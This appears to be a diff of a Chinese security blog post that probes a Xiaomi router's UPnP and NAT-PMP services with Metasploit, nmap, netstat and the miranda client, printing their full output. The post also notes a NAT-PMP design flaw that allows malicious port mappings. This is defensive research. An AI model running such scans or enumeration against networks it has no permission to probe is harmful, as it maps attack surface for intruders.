-<h1 id="对小米WIFI路由器的UPnP分析"><a href="#对小米WIFI路由器的UPnP分析" class="headerlink" title="对小米WIFI路由器的UPnP分析"></a>对小米WIFI路由器的UPnP分析</h1><h2 id="使用工具扫描"><a href="#使用工具扫描" class="headerlink" title="使用工具扫描"></a>使用工具扫描</h2><h3 id="使用Metasploit检查"><a href="#使用Metasploit检查" class="headerlink" title="使用Metasploit检查"></a>使用Metasploit检查</h3><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">msf5 &gt; use auxiliary/scanner/upnp/ssdp_msearch</span><br><span class="line">msf5 auxiliary(scanner/upnp/ssdp_msearch) &gt; set RHOSTS <span class="number">192.168</span><span class="meta">.31</span><span class="meta">.0</span>/<span class="number">24</span></span><br><span class="line">RHOSTS =&gt; <span class="number">192.168</span><span class="meta">.31</span><span class="meta">.0</span>/<span class="number">24</span></span><br><span class="line">msf5 auxiliary(scanner/upnp/ssdp_msearch) &gt; run</span><br><span class="line"></span><br><span class="line">[*] Sending UPnP SSDP probes to <span class="number">192.168</span><span class="meta">.31</span><span class="meta">.0</span>-&gt;<span class="number">192.168</span><span class="meta">.31</span><span class="meta">.255</span> (<span class="number">256</span> hosts)</span><br><span class="line">[*] <span class="number">192.168</span><span class="meta">.31</span><span class="meta">.1</span>:<span class="number">1900</span> SSDP MiWiFi/x UPnP/<span class="number">1.1</span> MiniUPnPd/<span class="number">2.0</span> | http://<span class="number">192.168</span><span class="meta">.31</span><span class="meta">.1</span>:<span class="number">5351</span>/rootDesc.xml | uuid:f3539dd5-8dc5-420c-<span class="number">9070</span>-c6f66d27fc8c::upnp:rootdevice</span><br><span class="line">[*] Scanned <span class="number">256</span> of <span class="number">256</span> hosts (<span class="number">100</span>% complete)</span><br><span class="line">[*] Auxiliary module execution completed</span><br></pre></td></tr></table></figure>
+<h1 id="对小米WIFI路由器的UPnP分析"><a href="#对小米WIFI路由器的UPnP分析" class="headerlink" title="对小米WIFI路由器的UPnP分析"></a>对小米WIFI路由器的UPnP分析</h1><h2 id="使用工具扫描"><a href="#使用工具扫描" class="headerlink" title="使用工具扫描"></a>使用工具扫描</h2><h3 id="使用Metasploit检查"><a href="#使用Metasploit检查" class="headerlink" title="使用Metasploit检查"></a>使用Metasploit检查</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">msfconsole</span><br><span class="line">msf5 &gt; use auxiliary/scanner/upnp/ssdp_msearch</span><br><span class="line">msf5 auxiliary(scanner/upnp/ssdp_msearch) &gt; set RHOSTS 192.168.31.0/24</span><br><span class="line">RHOSTS =&gt; 192.168.31.0/24</span><br><span class="line">msf5 auxiliary(scanner/upnp/ssdp_msearch) &gt; run</span><br><span class="line"></span><br><span class="line">[*] Sending UPnP SSDP probes to 192.168.31.0-&gt;192.168.31.255 (256 hosts)</span><br><span class="line">[*] 192.168.31.1:1900 SSDP MiWiFi/x UPnP/1.1 MiniUPnPd/2.0 | http://192.168.31.1:5351/rootDesc.xml | uuid:f3539dd5-8dc5-420c-9070-c6f66d27fc8c::upnp:rootdevice</span><br><span class="line">[*] Scanned 256 of 256 hosts (100% complete)</span><br><span class="line">[*] Auxiliary module execution completed</span><br></pre></td></tr></table></figure>
 <p>从中可以得到这些信息：</p>
 <ul>
 <li>UPnP/1.1</li>
 <li>MiniUPnPd/2.0</li>
 </ul>
-<h3 id="使用nmap进行扫描"><a href="#使用nmap进行扫描" class="headerlink" title="使用nmap进行扫描"></a>使用nmap进行扫描</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">nmap -p1900，5351 192.168.31.1</span><br><span class="line"></span><br><span class="line">PORT     STATE    SERVICE</span><br><span class="line">1900/tcp filtered upnp</span><br><span class="line">5351/tcp open     nat-pmp</span><br></pre></td></tr></table></figure>
+<h3 id="使用nmap进行扫描"><a href="#使用nmap进行扫描" class="headerlink" title="使用nmap进行扫描"></a>使用nmap进行扫描</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">nmap -p1900，5351 192.168.31.1</span><br><span class="line"></span><br><span class="line">PORT     STATE    SERVICE</span><br><span class="line">1900/tcp filtered upnp</span><br><span class="line">5351/tcp open     nat-pmp</span><br></pre></td></tr></table></figure>
 <p><strong><em>nat-pmp</em></strong><br>NAT端口映射协议（英语：NAT Port Mapping Protocol，缩写NAT-PMP）是一个能自动创建网络地址转换（NAT）设置和端口映射配置而无需用户介入的网络协议。该协议能自动测定NAT网关的外部IPv4地址，并为应用程序提供与对等端交流通信的方法。NAT-PMP于2005年由苹果公司推出，为更常见的ISO标准互联网网关设备协议（被许多NAT路由器实现）的一个替代品。该协议由互联网工程任务组（IETF）在RFC 6886中发布。<br>NAT-PMP使用用户数据报协议（UDP），在5351端口运行。该协议没有内置的身份验证机制，因为转发一个端口通常不允许任何活动，也不能用STUN方法实现。NAT-PMP相比STUN的好处是它不需要STUN服务器，并且NAT-PMP映射有一个已知的过期时间，应用可以避免低效地发送保活数据包。<br>NAT-PMP是端口控制协议（PCP）的前身。<br><a href="https://laucyun.com/25118b151a3386b7beff250835fe7e98.html" target="_blank" rel="noopener">https://laucyun.com/25118b151a3386b7beff250835fe7e98.html</a><br>2014年10月，Rapid7安全研究员Jon Hart公布，因厂商对NAT-PMP协议设计不当，估计公网上有1200万台网络设备受到NAT-PMP漏洞的影响。NAT-PMP协议的规范中特别指明，NAT网关不能接受来自外网的地址映射请求，但一些厂商的设计并未遵守此规定。黑客可能对这些设备进行恶意的端口映射，进行流量反弹、代理等攻击。</p>
-<h3 id="netstat扫描"><a href="#netstat扫描" class="headerlink" title="netstat扫描"></a>netstat扫描</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Proto Recv-Q Send-Q Local<span class="built_in"> Address </span>        Foreign<span class="built_in"> Address </span>   State    <span class="keyword">in</span> out PID/Program name</span><br><span class="line">tcp   0      0      :::5351               :::*               LISTEN   0 0 18068/miniupnpd</span><br><span class="line">udp   0      0      192.168.31.1:5351     0.0.0.0:*          0        0 18068/miniupnpd</span><br><span class="line">udp   0      0      0.0.0.0:1900          0.0.0.0:*          1414113  1827652 18068/miniupnpd</span><br></pre></td></tr></table></figure>
+<h3 id="netstat扫描"><a href="#netstat扫描" class="headerlink" title="netstat扫描"></a>netstat扫描</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">Proto Recv-Q Send-Q Local Address         Foreign Address    State    in out PID/Program name</span><br><span class="line">tcp   0      0      :::5351               :::*               LISTEN   0 0 18068/miniupnpd</span><br><span class="line">udp   0      0      192.168.31.1:5351     0.0.0.0:*          0        0 18068/miniupnpd</span><br><span class="line">udp   0      0      0.0.0.0:1900          0.0.0.0:*          1414113  1827652 18068/miniupnpd</span><br></pre></td></tr></table></figure>
 <p>端口1900在UPnP发现的过程中使用，5351通常为端口映射协议NAT-PMP运行的端口</p>
-<h3 id="miranda"><a href="#miranda" class="headerlink" title="miranda"></a><a href="https://www.ethicalhacker.net/columns/heffner/plug-n-play-network-hacking/" target="_blank" rel="noopener">miranda</a></h3><figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br></pre></td><td class="code"><pre><span class="line">sudo python2 miranda.py -i wlx44334c388fbd -v</span><br><span class="line"></span><br><span class="line">Miranda v1.<span class="number">3</span></span><br><span class="line">The interactive UPnP client</span><br><span class="line">Craig Heffner, http://www.devttys0.com</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Binding to <span class="keyword">interface</span> wlx44334c388fbd ...</span><br><span class="line"></span><br><span class="line">Verbose mode enabled!</span><br><span class="line">upnp&gt; msearch</span><br><span class="line"></span><br><span class="line">Entering discovery mode <span class="keyword">for</span> <span class="symbol">'upnp</span>:rootdevice', Ctl+C to stop...</span><br><span class="line"></span><br><span class="line">****************************************************************</span><br><span class="line">SSDP reply message from <span class="number">192.168</span>.<span class="number">31.1</span>:<span class="number">5351</span></span><br><span class="line">XML file <span class="keyword">is</span> located <span class="keyword">at</span> http://<span class="number">192.168</span>.<span class="number">31.1</span>:<span class="number">5351</span>/rootDesc.xml</span><br><span class="line">Device <span class="keyword">is</span> running MiWiFi/x UPnP/<span class="number">1.1</span> MiniUPnPd/<span class="number">2.0</span></span><br><span class="line">****************************************************************</span><br><span class="line"></span><br><span class="line">upnp&gt; host get <span class="number">0</span></span><br><span class="line"></span><br><span class="line">Requesting device <span class="keyword">and</span> service info <span class="keyword">for</span> <span class="number">192.168</span>.<span class="number">31.1</span>:<span class="number">5351</span> (this could take a few seconds)...</span><br><span class="line"></span><br><span class="line">Device urn:schemas-upnp-org:device:WANDevice:<span class="number">1</span> does <span class="keyword">not</span> have a presentationURL</span><br><span class="line">Device urn:schemas-upnp-org:device:WANConnectionDevice:<span class="number">1</span> does <span class="keyword">not</span> have a presentationURL</span><br><span class="line">Host data enumeration complete!</span><br><span class="line"></span><br><span class="line">upnp&gt; host list</span><br><span class="line"></span><br><span class="line">	[<span class="number">0</span>] <span class="number">192.168</span>.<span class="number">31.1</span>:<span class="number">5351</span></span><br><span class="line"></span><br><span class="line">upnp&gt; host info <span class="number">0</span></span><br><span class="line"></span><br><span class="line">xmlFile : <span class="type">http</span>://<span class="number">192.168</span>.<span class="number">31.1</span>:<span class="number">5351</span>/rootDesc.xml</span><br><span class="line">name : 192.168.31.1:5351</span><br><span class="line">proto : <span class="type">http</span>://</span><br><span class="line">serverType : <span class="type">MiWiFi</span>/x UPnP/<span class="number">1.1</span> MiniUPnPd/<span class="number">2.0</span></span><br><span class="line">upnpServer : <span class="type">MiWiFi</span>/x UPnP/<span class="number">1.1</span> MiniUPnPd/<span class="number">2.0</span></span><br><span class="line">dataComplete : <span class="type">True</span></span><br><span class="line">deviceList : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info <span class="number">0</span> deviceList</span><br><span class="line"></span><br><span class="line">InternetGatewayDevice : &#123;&#125;</span><br><span class="line">WANDevice : &#123;&#125;</span><br><span class="line">WANConnectionDevice : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info <span class="number">0</span> deviceList WANConnectionDevice</span><br><span class="line"></span><br><span class="line">  manufacturerURL : <span class="type">http</span>://miniupnp.free.fr/</span><br><span class="line">  modelName : <span class="type">MiniUPnPd</span></span><br><span class="line">  UPC : 000000000000</span><br><span class="line">  modelNumber : 20180830</span><br><span class="line">  friendlyName : <span class="type">WANConnectionDevice</span></span><br><span class="line">  fullName : <span class="type">urn</span>:schemas-upnp-org:device:WANConnectionDevice:<span class="number">1</span></span><br><span class="line">  modelDescription : <span class="type">MiniUPnP</span> daemon</span><br><span class="line">  UDN : <span class="type">uuid</span>:f3539dd5-<span class="number">8</span>dc5-<span class="number">420</span>c-<span class="number">9070</span>-c6f66d27fc8e</span><br><span class="line">  modelURL : <span class="type">http</span>://miniupnp.free.fr/</span><br><span class="line">  manufacturer : <span class="type">MiniUPnP</span></span><br><span class="line">  services : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info <span class="number">0</span> deviceList WANConnectionDevice services WANIPConnection</span><br><span class="line"></span><br><span class="line">    eventSubURL : /<span class="type">evt</span>/IPConn</span><br><span class="line">    controlURL : /<span class="type">ctl</span>/IPConn</span><br><span class="line">    serviceId : <span class="type">urn</span>:upnp-org:serviceId:WANIPConn1</span><br><span class="line">    SCPDURL : /<span class="type">WANIPCn.xml</span></span><br><span class="line">    fullName : <span class="type">urn</span>:schemas-upnp-org:service:WANIPConnection:<span class="number">1</span></span><br><span class="line">    actions : &#123;&#125;</span><br><span class="line">    serviceStateVariables : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info <span class="number">0</span> deviceList WANConnectionDevice services WANIPConnection actions</span><br><span class="line"></span><br><span class="line">      AddPortMapping : &#123;&#125;</span><br><span class="line">      GetNATRSIPStatus : &#123;&#125;</span><br><span class="line">      GetGenericPortMappingEntry : &#123;&#125;</span><br><span class="line">      GetSpecificPortMappingEntry : &#123;&#125;</span><br><span class="line">      ForceTermination : &#123;&#125;</span><br><span class="line">      GetExternalIPAddress : &#123;&#125;</span><br><span class="line">      GetConnectionTypeInfo : &#123;&#125;</span><br><span class="line">      GetStatusInfo : &#123;&#125;</span><br><span class="line">      SetConnectionType : &#123;&#125;</span><br><span class="line">      DeletePortMapping : &#123;&#125;</span><br><span class="line">      RequestConnection : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info <span class="number">0</span> deviceList WANConnectionDevice services WANIPConnection serviceStateVariables</span><br><span class="line"></span><br><span class="line">        InternalClient : &#123;&#125;</span><br><span class="line">        Uptime : &#123;&#125;</span><br><span class="line">        PortMappingLeaseDuration : &#123;&#125;</span><br><span class="line">        PortMappingDescription : &#123;&#125;</span><br><span class="line">        RemoteHost : &#123;&#125;</span><br><span class="line">        PossibleConnectionTypes : &#123;&#125;</span><br><span class="line">        ExternalPort : &#123;&#125;</span><br><span class="line">        RSIPAvailable : &#123;&#125;</span><br><span class="line">        ConnectionStatus : &#123;&#125;</span><br><span class="line">        PortMappingNumberOfEntries : &#123;&#125;</span><br><span class="line">        ExternalIPAddress : &#123;&#125;</span><br><span class="line">        ConnectionType : &#123;&#125;</span><br><span class="line">        NATEnabled : &#123;&#125;</span><br><span class="line">        LastConnectionError : &#123;&#125;</span><br><span class="line">        InternalPort : &#123;&#125;</span><br><span class="line">        PortMappingProtocol : &#123;&#125;</span><br><span class="line">        PortMappingEnabled : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host summary <span class="number">0</span></span><br><span class="line"></span><br><span class="line">          Host: <span class="number">192.168</span>.<span class="number">31.1</span>:<span class="number">5351</span></span><br><span class="line">          XML File: http://<span class="number">192.168</span>.<span class="number">31.1</span>:<span class="number">5351</span>/rootDesc.xml</span><br><span class="line">          InternetGatewayDevice</span><br><span class="line">          	manufacturerURL: http://www.mi.com</span><br><span class="line">          	modelName: MiWiFi Router</span><br><span class="line">          	UPC: <span class="number">000000000000</span></span><br><span class="line">          	modelNumber: <span class="number">20180830</span></span><br><span class="line">          	presentationURL: http://miwifi.com/</span><br><span class="line">          	friendlyName: MiWiFi router</span><br><span class="line">          	fullName: urn:schemas-upnp-org:device:InternetGatewayDevice:<span class="number">1</span></span><br><span class="line">          	modelDescription: MiWiFi Router</span><br><span class="line">          	UDN: uuid:f3539dd5-<span class="number">8</span>dc5-<span class="number">420</span>c-<span class="number">9070</span>-c6f66d27fc8c</span><br><span class="line">          	modelURL: http://www1.miwifi.com</span><br><span class="line">          	manufacturer: Xiaomi</span><br><span class="line">          WANDevice</span><br><span class="line">          	manufacturerURL: http://miniupnp.free.fr/</span><br><span class="line">          	modelName: WAN Device</span><br><span class="line">          	UPC: <span class="number">000000000000</span></span><br><span class="line">          	modelNumber: <span class="number">20180830</span></span><br><span class="line">          	friendlyName: WANDevice</span><br><span class="line">          	fullName: urn:schemas-upnp-org:device:WANDevice:<span class="number">1</span></span><br><span class="line">          	modelDescription: WAN Device</span><br><span class="line">          	UDN: uuid:f3539dd5-<span class="number">8</span>dc5-<span class="number">420</span>c-<span class="number">9070</span>-c6f66d27fc8d</span><br><span class="line">          	modelURL: http://miniupnp.free.fr/</span><br><span class="line">          	manufacturer: MiniUPnP</span><br><span class="line">          WANConnectionDevice</span><br><span class="line">          	manufacturerURL: http://miniupnp.free.fr/</span><br><span class="line">          	modelName: MiniUPnPd</span><br><span class="line">          	UPC: <span class="number">000000000000</span></span><br><span class="line">          	modelNumber: <span class="number">20180830</span></span><br><span class="line">          	friendlyName: WANConnectionDevice</span><br><span class="line">          	fullName: urn:schemas-upnp-org:device:WANConnectionDevice:<span class="number">1</span></span><br><span class="line">          	modelDescription: MiniUPnP daemon</span><br><span class="line">          	UDN: uuid:f3539dd5-<span class="number">8</span>dc5-<span class="number">420</span>c-<span class="number">9070</span>-c6f66d27fc8e</span><br><span class="line">          	modelURL: http://miniupnp.free.fr/</span><br><span class="line">          	manufacturer: MiniUPnP</span><br></pre></td></tr></table></figure>
+<h3 id="miranda"><a href="#miranda" class="headerlink" title="miranda"></a><a href="https://www.ethicalhacker.net/columns/heffner/plug-n-play-network-hacking/" target="_blank" rel="noopener">miranda</a></h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br></pre></td><td class="code"><pre><span class="line">sudo python2 miranda.py -i wlx44334c388fbd -v</span><br><span class="line"></span><br><span class="line">Miranda v1.3</span><br><span class="line">The interactive UPnP client</span><br><span class="line">Craig Heffner, http://www.devttys0.com</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Binding to interface wlx44334c388fbd ...</span><br><span class="line"></span><br><span class="line">Verbose mode enabled!</span><br><span class="line">upnp&gt; msearch</span><br><span class="line"></span><br><span class="line">Entering discovery mode for &apos;upnp:rootdevice&apos;, Ctl+C to stop...</span><br><span class="line"></span><br><span class="line">****************************************************************</span><br><span class="line">SSDP reply message from 192.168.31.1:5351</span><br><span class="line">XML file is located at http://192.168.31.1:5351/rootDesc.xml</span><br><span class="line">Device is running MiWiFi/x UPnP/1.1 MiniUPnPd/2.0</span><br><span class="line">****************************************************************</span><br><span class="line"></span><br><span class="line">upnp&gt; host get 0</span><br><span class="line"></span><br><span class="line">Requesting device and service info for 192.168.31.1:5351 (this could take a few seconds)...</span><br><span class="line"></span><br><span class="line">Device urn:schemas-upnp-org:device:WANDevice:1 does not have a presentationURL</span><br><span class="line">Device urn:schemas-upnp-org:device:WANConnectionDevice:1 does not have a presentationURL</span><br><span class="line">Host data enumeration complete!</span><br><span class="line"></span><br><span class="line">upnp&gt; host list</span><br><span class="line"></span><br><span class="line">	[0] 192.168.31.1:5351</span><br><span class="line"></span><br><span class="line">upnp&gt; host info 0</span><br><span class="line"></span><br><span class="line">xmlFile : http://192.168.31.1:5351/rootDesc.xml</span><br><span class="line">name : 192.168.31.1:5351</span><br><span class="line">proto : http://</span><br><span class="line">serverType : MiWiFi/x UPnP/1.1 MiniUPnPd/2.0</span><br><span class="line">upnpServer : MiWiFi/x UPnP/1.1 MiniUPnPd/2.0</span><br><span class="line">dataComplete : True</span><br><span class="line">deviceList : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info 0 deviceList</span><br><span class="line"></span><br><span class="line">InternetGatewayDevice : &#123;&#125;</span><br><span class="line">WANDevice : &#123;&#125;</span><br><span class="line">WANConnectionDevice : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info 0 deviceList WANConnectionDevice</span><br><span class="line"></span><br><span class="line">  manufacturerURL : http://miniupnp.free.fr/</span><br><span class="line">  modelName : MiniUPnPd</span><br><span class="line">  UPC : 000000000000</span><br><span class="line">  modelNumber : 20180830</span><br><span class="line">  friendlyName : WANConnectionDevice</span><br><span class="line">  fullName : urn:schemas-upnp-org:device:WANConnectionDevice:1</span><br><span class="line">  modelDescription : MiniUPnP daemon</span><br><span class="line">  UDN : uuid:f3539dd5-8dc5-420c-9070-c6f66d27fc8e</span><br><span class="line">  modelURL : http://miniupnp.free.fr/</span><br><span class="line">  manufacturer : MiniUPnP</span><br><span class="line">  services : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info 0 deviceList WANConnectionDevice services WANIPConnection</span><br><span class="line"></span><br><span class="line">    eventSubURL : /evt/IPConn</span><br><span class="line">    controlURL : /ctl/IPConn</span><br><span class="line">    serviceId : urn:upnp-org:serviceId:WANIPConn1</span><br><span class="line">    SCPDURL : /WANIPCn.xml</span><br><span class="line">    fullName : urn:schemas-upnp-org:service:WANIPConnection:1</span><br><span class="line">    actions : &#123;&#125;</span><br><span class="line">    serviceStateVariables : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info 0 deviceList WANConnectionDevice services WANIPConnection actions</span><br><span class="line"></span><br><span class="line">      AddPortMapping : &#123;&#125;</span><br><span class="line">      GetNATRSIPStatus : &#123;&#125;</span><br><span class="line">      GetGenericPortMappingEntry : &#123;&#125;</span><br><span class="line">      GetSpecificPortMappingEntry : &#123;&#125;</span><br><span class="line">      ForceTermination : &#123;&#125;</span><br><span class="line">      GetExternalIPAddress : &#123;&#125;</span><br><span class="line">      GetConnectionTypeInfo : &#123;&#125;</span><br><span class="line">      GetStatusInfo : &#123;&#125;</span><br><span class="line">      SetConnectionType : &#123;&#125;</span><br><span class="line">      DeletePortMapping : &#123;&#125;</span><br><span class="line">      RequestConnection : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host info 0 deviceList WANConnectionDevice services WANIPConnection serviceStateVariables</span><br><span class="line"></span><br><span class="line">        InternalClient : &#123;&#125;</span><br><span class="line">        Uptime : &#123;&#125;</span><br><span class="line">        PortMappingLeaseDuration : &#123;&#125;</span><br><span class="line">        PortMappingDescription : &#123;&#125;</span><br><span class="line">        RemoteHost : &#123;&#125;</span><br><span class="line">        PossibleConnectionTypes : &#123;&#125;</span><br><span class="line">        ExternalPort : &#123;&#125;</span><br><span class="line">        RSIPAvailable : &#123;&#125;</span><br><span class="line">        ConnectionStatus : &#123;&#125;</span><br><span class="line">        PortMappingNumberOfEntries : &#123;&#125;</span><br><span class="line">        ExternalIPAddress : &#123;&#125;</span><br><span class="line">        ConnectionType : &#123;&#125;</span><br><span class="line">        NATEnabled : &#123;&#125;</span><br><span class="line">        LastConnectionError : &#123;&#125;</span><br><span class="line">        InternalPort : &#123;&#125;</span><br><span class="line">        PortMappingProtocol : &#123;&#125;</span><br><span class="line">        PortMappingEnabled : &#123;&#125;</span><br><span class="line"></span><br><span class="line">upnp&gt; host summary 0</span><br><span class="line"></span><br><span class="line">          Host: 192.168.31.1:5351</span><br><span class="line">          XML File: http://192.168.31.1:5351/rootDesc.xml</span><br><span class="line">          InternetGatewayDevice</span><br><span class="line">          	manufacturerURL: http://www.mi.com</span><br><span class="line">          	modelName: MiWiFi Router</span><br><span class="line">          	UPC: 000000000000</span><br><span class="line">          	modelNumber: 20180830</span><br><span class="line">          	presentationURL: http://miwifi.com/</span><br><span class="line">          	friendlyName: MiWiFi router</span><br><span class="line">          	fullName: urn:schemas-upnp-org:device:InternetGatewayDevice:1</span><br><span class="line">          	modelDescription: MiWiFi Router</span><br><span class="line">          	UDN: uuid:f3539dd5-8dc5-420c-9070-c6f66d27fc8c</span><br><span class="line">          	modelURL: http://www1.miwifi.com</span><br><span class="line">          	manufacturer: Xiaomi</span><br><span class="line">          WANDevice</span><br><span class="line">          	manufacturerURL: http://miniupnp.free.fr/</span><br><span class="line">          	modelName: 